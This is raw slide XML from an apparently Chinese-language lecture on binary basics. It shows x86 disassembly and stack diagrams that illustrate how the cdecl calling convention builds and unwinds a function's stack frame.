            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0: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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          pop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11:   c3          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Shape 428"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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00000012 &lt;caller&gt;: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12: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13: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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc        mov    -0x4(%ebp),%eax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30:   c9              leave</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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Shape 429"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Shape 430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389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int ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Shape 431"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799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432" name="Shape 432"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="32089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433" name="Shape 433"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="36185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434" name="Shape 434"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="365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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Shape 435"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028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3</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Shape 436"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437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2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Shape 437"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847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1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Shape 438"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="52569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439" name="Shape 439"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="56665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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="440" name="Shape 440"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="441" name="Shape 441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="442" name="Shape 442"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="443" name="Shape 443"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="5074141"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="444" name="Shape 444"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="11262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b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="445" name="Shape 445"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1770756"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="446" name="Shape 446"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="3118381"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="447" name="Shape 447"/>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%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="448" name="Shape 448"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="14542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26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FD0419D-8754-4296-AA37-E6FDE7B750D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73C862F3-FDF8-453E-AFF3-206897AD4818}"/>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27CE4A0-64B0-4E4D-96E4-0F36E850BD62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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D62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="8165762" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>二进制基础</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D36EB4-0DC5-495B-89A6-4FB3A6A77B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502725" y="2635527"/>
            <a:ext cx="7730836" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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程序的编译与链接</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Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>下的可执行文件格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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进程虚拟地址空间</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程序的装载与进程的执行</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x86&amp;amd64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>汇编简述</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3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470605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4" name="Shape 454"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0: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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          pop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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Shape 455"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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00000012 &lt;caller&gt;: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12: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13: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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f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23:   83 c4 0c        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>add    $0xc,%esp</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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc        mov    -0x4(%ebp),%eax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30:   c9              leave</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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="Shape 456"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Shape 457"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389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int ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Shape 458"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799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459" name="Shape 459"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="32089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460" name="Shape 460"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="36185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461" name="Shape 461"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="365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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Shape 462"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028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463" name="Shape 463"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437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464" name="Shape 464"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847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465" name="Shape 465"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="52569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466" name="Shape 466"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="56665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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="467" name="Shape 467"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="468" name="Shape 468"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="469" name="Shape 469"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="470" name="Shape 470"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="3321581"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="471" name="Shape 471"/>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%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="472" name="Shape 472"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="473" name="Shape 473"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="3854941"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="474" name="Shape 474"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="11262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b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="475" name="Shape 475"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1770756"/>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26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12369B57-76CE-4C87-A082-611225FBBB11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
